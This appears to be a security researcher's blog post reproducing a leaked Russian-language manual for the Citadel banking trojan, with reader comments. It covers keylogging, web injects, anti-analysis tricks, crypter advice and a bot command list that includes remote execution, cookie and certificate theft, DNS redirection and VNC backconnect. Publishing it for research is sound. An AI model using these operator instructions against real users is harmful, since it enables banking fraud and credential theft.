Когда 1й и 3й акк словят ещё несколько дисконнектов — они тоже будут отмечены как невалидные.

Добавленные позднее фичи:
- Режим "check only". Говорит за себя
- Опция: реифрейминг аккаунтов спустя N дней. Каждый аккаунт спустя N дней будет обработан заново.
- Замена старого ифрейм-кода новым. Если изменился HTML-код — он не тупо добавится а заменит собой старый :)
- Опция "ифреймить только вчерашние акки". Даст сутки на то чтобы игноры расставить)
- Логирование ошибок ифреймера (!)
- Умное распознавание папок (они неотличимы от файлов)
- Кнопка сброса. Благодаря защите от повторного ифрейма аккаунты она не испортит :) Заигноренные акки сохраняются (т.е. тоже не испортятся)
- Выборочный игнор аккаунтов (не ифреймить ни за что). Отмеченные игнором аккаунты отображаются сутки и прячутся. Если сделать сброс — они останутся и повисят ещё сутки.
- Сортировка: последние события (найден, отправлен, обработан) в хронологическом порядке сверху
- рычаг ручного запуска (полностью ручной режим). Это делается с помощью кликов по заданиям вверху, если ифреймер в режиме "off"
Например: кликаешь первое, получаешь новые акки. Нужные заигнорил, кликаешь второе: они улетают на обработку.
Третье задание — сбор результатов — всегда отрабатывает само :)

********************************************************************************
==========================>>>>> 16. Описания модуля "Кейлоггер процессов"
********************************************************************************
Для включения кейлоггера, в конфиге билдера прописываем новую секцию:
entry "Keylogger"
processes "calc.exe;*notepad*"
time 1
end
*notepad* поиск нужного процесса по имени
calc.exe точное название процесса
Здесь мы перечисляем список процессов, на которые мы устанавливаем кейлоггер.
Напомню, что кейлоггер по умолчанию включен для всех браузеров, поэтому пользуйтесь модулем, если вам необходимо отследить отдельно-взятые приложения.
time 1 указывает на время в минутах, сколько минут подряд, с момента запуска приложения записывать клавиши.
Секцию нужно прописать перед секцией entry "CmdList" или после нее.

Для поиска отчетов в админке, выбираем тип отчета: "Кейлоггер"

********************************************************************************
==========================>>>>> 17. Модульная GeoIP защита ботнета
********************************************************************************
Для включения модуля, заходим в раздел "Параметры" в админке, там есть пункт "Разрешённые страны", ставим галочку для включения и отмечаем нужные страны.
Все страны, которые будут не отмечены вами, автоматически попадают в игнор-лист, однако, отчеты от них все равно будут писаться, но при запросе конфига ботом через file.php и отсылки запросов на гейт, будет выдаваться ошибка 404 на уровне HTTP-сервера (это можно проверить снифером)
Бюджетный вариант от абуз. Рекомендуется использовать только для маленьких узконаправленных VIP-ботнетах, с целью перевода ценных ботов на особый ботнет.
Если заметили сильную нагрузку на сервер, немедленно отключайте настройку.
********************************************************************************
==========================>>>>> 18. Модуль "Дубль-клинер логов"
********************************************************************************
Для включения и отключения модуля, необходимо перейти в раздел "Параметры", подраздел Функции - "Дедупликация отчетов" включаем и отключаем.
Если заметили большую нагрузку на сервер, то рекомендуется отключить данный модуль т.к он не расчитан на большое количество ботов.


********************************************************************************
==========================>>>>> 19. Модуль веб-инжектов (WebInjects)
********************************************************************************
WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Все работает через админку.
Краткий ликбез:
В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
Если данный модуль не нужен, поскольку создает дополнительную нагрузку, то можно удалить эту строчку вообще.
В разделе "Веб-Инжекты" существуют 2 секции: "Группа вебинжектов" и "Паки" первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
В главном меню, в разделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только свой список инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельной группе и отдельной категории ботов по классу: страна или ботнет.
В админке присутствует специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
Сушествует несколько режимов для паков.
Dual - когда работает локальный файл с инжектами из конфига + вебинжекты.
Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также можно поискать DEBUG-отчеты по боту и также посмотреть историю сборок и ошибок вебинжектов.
Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
Для работы необходимо сделать chmod 777 на папку files/webinjects.
Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя.
Некоторые моменты из интерфейса:
Лимит скачиваний - если вам нужно прогрузить инжекты XXXX раз, независимо от страны, BotID или других признаков.
В каждый пак(бандл) можно включать инжекты из любой группы.

********************************************************************************
==========================>>>>> 20. Общая рекомендация и частые вопросы
********************************************************************************
Для избежания проблем на сервере со скриптами, рекомендуется устанавливать версию PHP не ниже 5.
Если вы хотите швейцарскую гарантию от реверса, вскрытия файлов на сервере, 100% защиты от трекеров и любых недугов, рекомендуем вам установить привязку на вашем сервере на страну, по которой вы работаете.
К примеру все ваши файлы по http будут доступны только юзерам, зашедшим с Испании, остальным, с других стран будет выдаваться 404.
Сделать это можно при помощи GeoIP модуля на сервер nginx, либо установить привязку на DNS.
Если интересно, можем дать команды хороших админов, кто может помочь в этом вопросе.
Как это сделать и советы по защите ботнета, вы можете ознакомиться в статье в "База знаний" внутри СРМ.
Также, хотим обратить внимание на то, что билд бота НЕ будет работать совместно с Proxifier'ом !
Если вы тестируете на виртуалке или у себя, обратите внимание чтобы у вас не было в системе русской или украинской раслкадки - иначе работать ничего не будет.
Также, вполне вероятны сбои на х64 - на система софт срабатывает корректно 50 / 50
Для просмотра видео можно использовать плеер VLC.
Теперь рекомендация криптерам по крипту Citadel:
- пеедавать адрес тело через GetModuleHandle с параметром NULL
- сохранять тело(целостность секций)
- сохранять оверлей
Инжекты полностью совместимы с зевсоформатом.
Не забудьте отключить антиэмулятор в конфиге, который задается опцией antiemulation_enable 1/0 (1 - включено, 0 - выключить), если тестируете в виртуальной машине.
Если опция включена, софт не будет работать на VMware, вместо этого софт будет генерировать кучу фейк-запросов на несуществующие домены, чтобы ввести в заблуждение автоматические ханипоты и реверсеров. Все запросы поддельные.
Если не знаете что такое антиэмулятор, посмотрите в самом начале анонос новостей.
Пароль на пришедшие в логи сертификаты: pass
Если испытываете проблемы с нагрузкой на сервер, попробуйте увеличить значение key_buffer в 2 раза больше (к примеру 512M) в конфиге MySQL (my.cnf)
Еще хотим обратить внимание на параметры в конфиге,
например параметр timer_config 1 5
timer_config [number1] [number2]
Определяет интервал времени в минутах, через которое бот обновляет с сервера конфиг.
[number1] - интервал в минутах, действующий в случае успешной загрузки конфига в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной загрузки конфига в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться обновить конфиг через указанный промежуток времени)
timer_logs [number1] [number2]
Определяет интервал времени в минутах, через которое бот отправляет накопленные логи.
[number1] - интервал в минутах, действующий в случае успешной отправки логов на сервер в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной отправки логов на сервер в прошлый раз. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться отправить накопленные и накапливаемые далее логи через указанный промежуток времени)
timer_stats [number1] [number2]
Определяет интервал времени в минутах, через которое бот отстукивает в админку и получает из нее команды.
Из этих данные админка анализирует нахождение бота в онлайн, а также при каждом отстуке отправляет новые имеющиеся команды,
например, на открытие сокса.
[number1] - интервал в минутах, действующий в случае успешного соединения с админкой.
[number2] - интервал в минутах, действующий в случае неудачного соединения с админкой. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться достучаться до админки через указанный промежуток времени)
timer_modules [number1] [number2]
Определяет интервал времени в минутах, через которое бот обновляет с сервера модули, например, видеомодуль.
[number1] - интервал в минутах, действующий в случае успешной загрузки видеомодуля в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной загрузки видеомодуля в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться загрузить видеомодуля через указанный промежуток времени)
timer_autoupdate [number1]
Определяет интервал времени в часах, при котором бот будет обновлять EXE с новым криптом.

[*] Что значит Unknown в статистике фаерволлов/антивирусов на pie-chart'e ? Это значит, что на ПК не стоит ни антивирус, ни фаерволл.
[*] Если вы даете какую-то команду через раздел скрипты и указываете выполнение команды на определенную страну, например "us", то обязательно включение в разделе "параметры" опции "geoip по каждому отчёту (только небольшие ботнеты)"
********************************************************************************
==========================>>>>> 21. Как правильно задавать вопросы в Jabber
********************************************************************************
Тема вопроса: Как обращаться в support и правильно задавать вопросы и решать проблемы.
Итак, предположим у вас случилась какая-то проблема с админкой или ботом.
Что делать? Прежде всего, вам конечно же, кажется что это баг в продукте, вам выдали ошибочный билдер, вам залили неправильные скрипты и вообще мир настроен против вас! Давайте оставим эмоции на потом, и будем рассуждать решать все логическим путем. Ответим себе на несколько вопросов:
1) Что было сделано в последний раз, после чего перестало что-то работать?
2) При каких условиях это было сделано (ex: тестирование прогрузкой ботов, на виртуальной машине, перенос старых ботов)
Правильно ли настроен сервер? Убедитесь что вы имеете последнюю версию скриптов + билдера.
Правильно ли выставлены у вас права на сервере? стоит ли везде chmod 777 на нужных файлах?
Вообще, рекомендуется для серверов использовать панель Direct Admin т.к она значительно упрощает работу с доменами.
Опять же, если вы не обладаете навыками администратирования серверов, не пытайтесь сделать из мухи слона. Наймите человека кто за доп.плату вам настроит сервер и установит при желании скрипты Citadel. За хорошую плату вам поставят защиту от DDoS'a и правильно-выставленные безопасные юзерские привелегии. Тех.поддержка не занимается администратированием ваших серверов и их настройкой, мы отвечаем только за скрипты Citadel. Проверяйте сначала проблему всегда на уровне сервера и клиента(настроек конфига) и общайтесь с админом, может быть отстук упал у вас из-за того, что сеть попала в блек-лист SpamHaus? Или админка не может установиться из-за того, что вы запустили апач под рутом? А может в конфиге неправильно выставлена маска урлов? Посмотрите еще раз в главный мануал.
Любого админа можно нанять через соответствующие форумы.
Услуги админов стоят в районе 100-200$.
Не экономьте на грамотной настройке сервера - это ваша инфраструктура.
У вас не работает бот?
Проверьте соответствует ли RC4 ключ в админке и в боте.
Работает ли корректно ваш крипт? Работает ли версия без крипта ?
Не присылается видео отчет? Проверьте, не стоят ли ограничения в PHP/Apache на загрузку файлов.
Вылетает ошибка Mysql: too many connections ? Проверьте, корректно ли работает ваш MYSQL-сервис на сервере, может быть он криво настроен, либо ваш сервер перегружен.
Может быть вас DDoS'ят? Смотрите куда и на что идет нагрузка, на какие скрипты. Воспользуйтесь штатными утилитами.
Пытаетесь запустить на VmWare и у вас не работает бот? Проверьте вашу внимательность, случаем, не русская ли это версия образа винды?
Не работает VNC гейт? Смотрите, работает ли PHP вообще на Windows-сервере, и правильно ли он настроен VNC-коннектор.
Оцените субъективно вашу внимательность к деталям, уверенность в действиях и логические шаги и приступайте к тестированию. Не бойтесь экспериментировать, ничего не сломается. Что-то внедрили? Протестите сначала на себе и на малом количестве ботов, прежде чем внести в работу.
Сначала протестируйте, потом пишите в саппорт. Не надо писать "у меня не работает что-то..." дайте знать сразу условия: что вы делали, как вы делали, где вы делали, что произошло, что не произошло, что должно произойти. Как можно больше информации в 1 сообщении! Представьте, что вы даете показания и описываете ВСЕ МЕЛЬЧАЙШИЕ ДЕТАЛИ.
Например: "У меня не работает VNC, запускаю бота на вмваре - отстукивает в основную админку. Даю команду на выполнение соединения уже в VNC админке - дальше ничего не происходит, проверил работает ли вообще Windows-сервер: тут у меня возникли сомнения, т.к отображается содержимое php-файлов в браузере, что может быть?"
Помните: правильно сформулированный вопрос - половина правильного ответа.
Клиентов становится больше, а саппорт один, поэтому каждый должен соблюдать нижеприведенные условия!
Озвучу несколько важных правил, при обращении к саппорту:
1) Никогда не пишите "привет? как дела?", из этой же серии "ты тут?", эти вопросы всегда останутся без ответа. Пишите сразу ваш вопрос/предложение/баг ОДНИМ сообщением, прилагайте как можно больше информации: что делаете, как делаете, какой результат, что хотелось бы получить.
2) Пишите с того же Jabber'a, с которого делали заказ продукта, никаких саппортов, доверенных лиц и т.п мы не принимаем к общению, если вы их не указали заранее при покупке.
3) Пожалейте наши глаза, не пишите по возможности TRANSLITOM - скорость считывания информация и ее усваивание снижается в разы!
4) Не долбите вопросами "когда будет апдейт?", "когда уже выдашь?", "когда будет это?" - если вы что-то заказали или разместили заявку, значит мы непременно на нее ответим и выдадим вам что нужно, т.к все записано. У саппорта есть свои приоритеты на разные типы заявок, если мы что-то задерживаем, значит оно так надо, это может быть дополнительное тестирование, багфикс и т.п
5) Не стоит задавать откровенно глупые вопросы, на которые вы можете найти ответ потратив 5 минут поиска в гугле, либо спросив у коллег по цеху на форуме. Вопросы в стиле "как закачать файлы на сервер", "почему не работает домен", "как выставить права" и т.п остаются без внимания.
6) Чем больше вы даете информации по проблеме, тем качественнее и доступнее вы получите ответ.
7) На вопросы когда будет апдейт, когда выдадут покупку и т.п саппорт НЕ отвечает, если вы подали заявку на что-то, она будет обработана в ближайшее время и мы про нее не забыли. Подобными вопросами будете только действовать на нервы и мешать доработке.
Срок обработки, если вы хотите купить новый модуль от 3 до 72 часов. В связи с большим количеством разных заявок (смена железа, докупка модулей, покупка лицензии, перевязка партнеру...) все заявки на получение чего либо(например купленного модуля) будут обрабатываться от 3 часов до 72 часов.
Убедительная просьба не спрашивать и не задавать вопросы, когда что-то будет или появится, не писать каждые 5 минут "как там дела? когда уже выдашь покупку?" - этим вы никак не ускорите процесс выдачи, а только будете отвлекать от работы и саппорта и кодера. Все заявки собираются в течении 1-3 дней и комплекты отдаются разом в одно время всем, никаких "мне как можно скорее" быть теперь не может.
8) Не спрашивайте когда выдет новая версия т.к разработка своим ходом и как только появится новая версия, мы вам обязательно сообщим, если вы наш клиент.

********************************************************************************
==========================>>>>> 22. Лицензионное соглашение и правила использования
********************************************************************************
1. Приобретая продукт Citadel, вся ответственность за его использование лежит на вас. Команда разработчиков Citadel Software не несет ответственности за любые неправомерные действия с использованием данного ПО. Софт предназначен для тестирования корпоративной политики безопасности внутри частных компаний.
2. Команда разработчиков Citadel Software категорически не поддерживают использование данного продукта на территории СНГ, продукт не будет работать на системах, с русскоязычной и украинской раскладкой.
3. После согласования условий в момент покупки и передачи денежных средств разработчику, данные средства не могут быть более возвращены клиенту обратно.
4. Перед покупкой, клиент обязуется ознакомиться с полным описанием продукта и его функционалом, при имеющихся вопросах, обратиться в тех.поддержку.
5. Клиент обязуетеся использовать персональный билдер на 1 компьютере и не передавать его третьим лицам, персональный билдер имеет уникальную сигнатуру, принадлежащую только вам. Все остальные вопросы по данному вопросу оговариваются в личной беседе. Барыжнечество/перепродажа без согласия автора наказуемы black list'ом и лишением лицензии.
6. Клиент обязуетеся ежемесячно вносить арендную плату, установленную разработчиками. Максимальный срок просрочки - 10 дней. Если сумма поддержка не была внесена, ваш аккаунт блокируется в Citadel CRM и вы лишаетесь всех дальнейших обновлений продукта на 1-3 месяца (решается индвидуально).
7. Стоимость поддержки определяется разработчиками и на данный момент составляет $125.00 LR, в эту стоимость входит финансирование дальнейшей разработки продукта, плановые чистки и мотивация кодеров работать дальше над проектом. В эту стоимость не входит сервис или качество услуг по поддержке клиентов. Поддержка осуществляется "as is". Софт изначально расчитан на тех, кто ранее работал с подобными программами и ботами, если у вас нет опыта - мы ничем не сможем помочь, у вас возникнет большое количество вопросов, на которые у нас нет времени отвечать.
8. Любые вопросы/замеченые ошибки в софте/недочеты/идеи, принимаются через ticket-панель в вашем персональном аккаунте Citadel CRM.
9. Клиенту выдается аккаунт в системе Citadel CRM, данный аккаунт принадлежит исключительно клиенту и передача его третьим лицам запрещена.
10. Клиент имеет право передать или продать свою лицензию на продукт, предварительно согласовав свои действия с разработчиками, после прохождения определенной верификации нового владельца, права на лицензию будут переоформлены. За перепродажу лицензии взымается комиссия в размере $500.00
11. Команда разработчиков Citadel Software не несет ответственности за обнаружение продукта в различных антивирусных системах, но в свою очередь старается этого недопускать и делать все необходимое для избежания этого.
12. Все операции с денежными средствами осуществляются исключительно через платежную систему Liberty Reserve, другие платежные инструменты недопускаются к использованию. Оперативно обменять средства из различных платежных систем, можно на сайте mmgp.ru
13. Дополнительные модули для продукта Citadel можно приобрести в любое время.
14. В случае неразрешения споров по поводу корректной работы функционала софта, клиент обязуется предоставить доступ к ПК, где установлен тестовой бот или вебсервер support'у, в противном случае support не сможет оказать помощь в данном вопросе.
15. В задачи тех.поддержки не входит установка и настройка софта на сервере/серверах клиента, клиент обязуется сам установить или настроить необходимое ПО на сервере, либо привлечь соответствующих специалистов, а также протестировать корректную работу ПО. Установка и настройка продукта тех.поддержкой осуществляется за доп.плату.
16. Citadel не продается англоязычной публике (амеры, румыны, азиаты, любой англоговорящий человек), запрещено быть представителями данных субъектов и обслуживать их интересы(читать: быть посредником), за несоблюдение данного правила следует лишение лицензии и создание BLACK LIST'a за жесткое нарушение правил.
Софт предназначен только для русскогоязычной публики.
17. Запрещено организовывать сервисы по продаже разовых "билдов" Citadel, а также продавать доступ к своему ботнету или сдавать его в аренду третьим лицам. За любое выявление данного факта на форумах, будет вынесено предупреждение, повторное нарушение приведет к лишении лицензии.
18. Выдача любых покупок(новых модулей), обновлений, скриптов, комплектов и т.п занимает от 3 до 72 часов с момента подачи заявки, просьба не флудить вопросами "когда уже выдашь что-то?" или "можно мне поскорее"
19. Если при сборке ехе-билда, билдер выдает ошибку "ERROR: Source executable file corrupted." значит вы сменили железо или программную среду(виртуальную машину) и привязка билдера просто слетела. Не рекомендуется ставить билдер на виртуальные машины, которые переносятся с PC на другой PC и компьтеры/серверы которые нестабильно работают.
Купите самый дешевый нетбук для билдера или VPS с Windows и поставьте туда, чтобы там стоял надежно ваш билдер долгое время. Т.к возможны проблемы с привязкой, если пользуетесь такими утилитами как CCTools или любыми другими, которые меняют mac-адреса, параметры системы и т.п
20. В связи с большим количеством вопросов support'у в jabber и в CRM, мы не гарантируем найти решение или ответ на ваш вопрос. Большинство вопросов связанных с настройкой сервера или apache/php вы можете найти в Google. Вопросы, которые обсуждали много раз, вы можете найти на форумах, CRM или спросить у коллег, кто сможет вам помочь. Просьба задавать вопросы, только если вы действительно считаете ваш вопрос серьезным и важным.
21. При попадании вашей админки или комплекта(скриншоты, описания, тексты, доступы) в паблик по вашей вине(даже если вы были взломаны), вы сразу лишаетесь лицензии. Также как и при обнаружении вашего комплекта у третьих лиц,в т.ч на различных форумах. Ответственность за сохранность комплекта несете только вы. Удаляйте архивы и файлы с файлообменников и серверов своевременно.
********************************************************************************
==========================>>>>> 23. Список команд для бота
********************************************************************************
Работы с OC.
os_shutdown - Выключить компьютер
os_reboot - Перегрузить компьютер
Работа с ботом.
bot_uninstall - Выгрузить бота с компьютера
bot_update [url] - Обновить конфигурационный файл бота
- - - - - - - - - - - - - - - - - -- - - - - - - - -- - - - - - - - -- - - - - - - - -
Работа с VNC:
bot_bc_add [service] [ip] [port] - Создать бек-коннект соединение с ботом через Win VNC-коннектор.
bot_bc_remove [service] [ip] [port] - Удалить бек-коннект соеднение с ботом через Win VNC-коннектор.
Пример работы ручных команд, если вы не покупали модуль VNC:
bot_bc_add socks XXX.XXX.XXX.XXX XXXXX
bot_bc_add vnc XXX.XXX.XXX.XXX XXXXX
Здесь должны быть указаны данные Windows VNC-коннектора, для этого на сервере запускаем утилиту из архива server\cbcs.exe
Citadel Backconnect Server 1.2.0.0.
Build time: 10:00:43 25.01.2012 GMT.
Usage: cbcs.exe <command> -<switch 1> -<switch N>
listen Start a backconnect server for one bot.
-nologo Suppresses display of sign-on banner.
-ipv4 Listen on IPv4 port.
-ipv6 Listen on IPv6 port.
-bp:[port] TCP port for accepting a connection from bot.
-cp:[port] TCP port for accepting a connection from сlient.

CONSOLE> cbcs.exe listen -cp:1111 -bp:2222
Citadel Backconnect Server 1.2.0.0.
Build time: 10:00:43 25.01.2012 GMT.
Listening on IPv4 port 2222.
Listening on IPv4 port 1111.
Press Ctrl+C key to shutdown server.
Waiting for incoming connections (port of bot: 2222, port of client: 1111)...
И таким образом даем команду боту bot_bc_add vnc XXX.XXX.XXX.XXX 2222
-bp порт указывается в команде в админке.
Мы же коннектимся на Win VNC-коннектор посредством любого VNC-клиента либо SOCKS'офикатора.
- - - - - - - - -- - - - - - - - -- - - - - - - - -- - - - - - - - -- - - - - - - - -
bot_httpinject_disable [url_mask] - Отключить выполнение инжекта у бота
bot_httpinject_enable [url_mask] - Включить выполнение инжекта у бота
Работа с пользователем.
user_destroy - Убить ОСь бота (если есть привилегии)
user_logoff - Завершить сеанс пользователя бота
user_execute [url] - Запустить исполняемый файл на компьютере бота
user_cookies_get - Получить куки с компьютера бота
user_cookies_remove - Удалить куки с компьютера бота
user_certs_get - Получить сертификаты с компьютера бота. Пароль на сертификаты: pass
user_certs_remove - Удалить сертификаты с компьютера бота
user_url_block [url_mask] - Заблокировать URL
user_url_unblock [url_mask] - Разблокировать URL
user_homepage_set [url] - Задать URL как домашнюю страницу боту
user_flashplayer_get - Получить SOL файлы с компьютера бота
user_flashplayer_remove - Удалить SOL файлы с компьютера бота
dns_filter_add <host> <ip> - добавление маски для редиректа
dns_filter_add *microsoft.com* 127.0.0.1 - добавление маски для редиректа
dns_filter_remove *microsoft.com* - удаление маски для редиректа
dns_filter_remove <host> при удалении должен быть указан такой же хост как и при добавлении
url_open http://www.host.com
Открываем на компьютере холдера произвольную заданную страницу дефлотовым браузером на полный экран, идеально для рекламы чего-либо

user_execute http://www.citadel-host.com/file.exe
Команда, которая позволяет запускать произвольные ехе-файлы.

user_execute http://www.citadel-host.com/file.exe -f
Команда, которая позволяет перезаписать текущую версию Citadel на болеее новую(благодаря флагу -f), при условии, что encryption_key в конфиге совпадает.

Дополнительные параметры cекции WebFilters
Два новых параметра: P и G.
Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.
Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.
Параметр ! игнорирует заданные запросы по маске и не пропускает их в логи.
Examples:
"Phttp://*.com/" - грабит только все пост-запросы в http://. https:// игнорирует
"Ghttp://*.eu/*banking*" - грабит только все GET запросы по заданной маске.
"Phttps://*.com/" - грабит только https://-post запросы
"!http://*.com/*.jpg" - игнор jpg картинок.

Like i've already told on many e-mails, i'm not really into Citadel tracking, if you want more, i think you should follow Kafeine works, he seem passionate like i was for SpyEye.

PS: Congratulation Aquabox for your 'rain edition' released since one week, it took me just one LinkedIn Spam to get my attention and get the package (and i'm just a simple guys, not from AV business)
"You can run but you can't hide" researchers will always have your crapwares sooner or later.
 

5 comments:

  1. Great Job Steve

    ReplyDelete
  2. Hey Steve,
    i was wondering what trick you are using so as to get into the index/panel.If you could share,i would be pleased.

    ReplyDelete
  3. Thanks and well done Xyl !

    ReplyDelete
  4. ppl cry Aquabox is a ripper

    ReplyDelete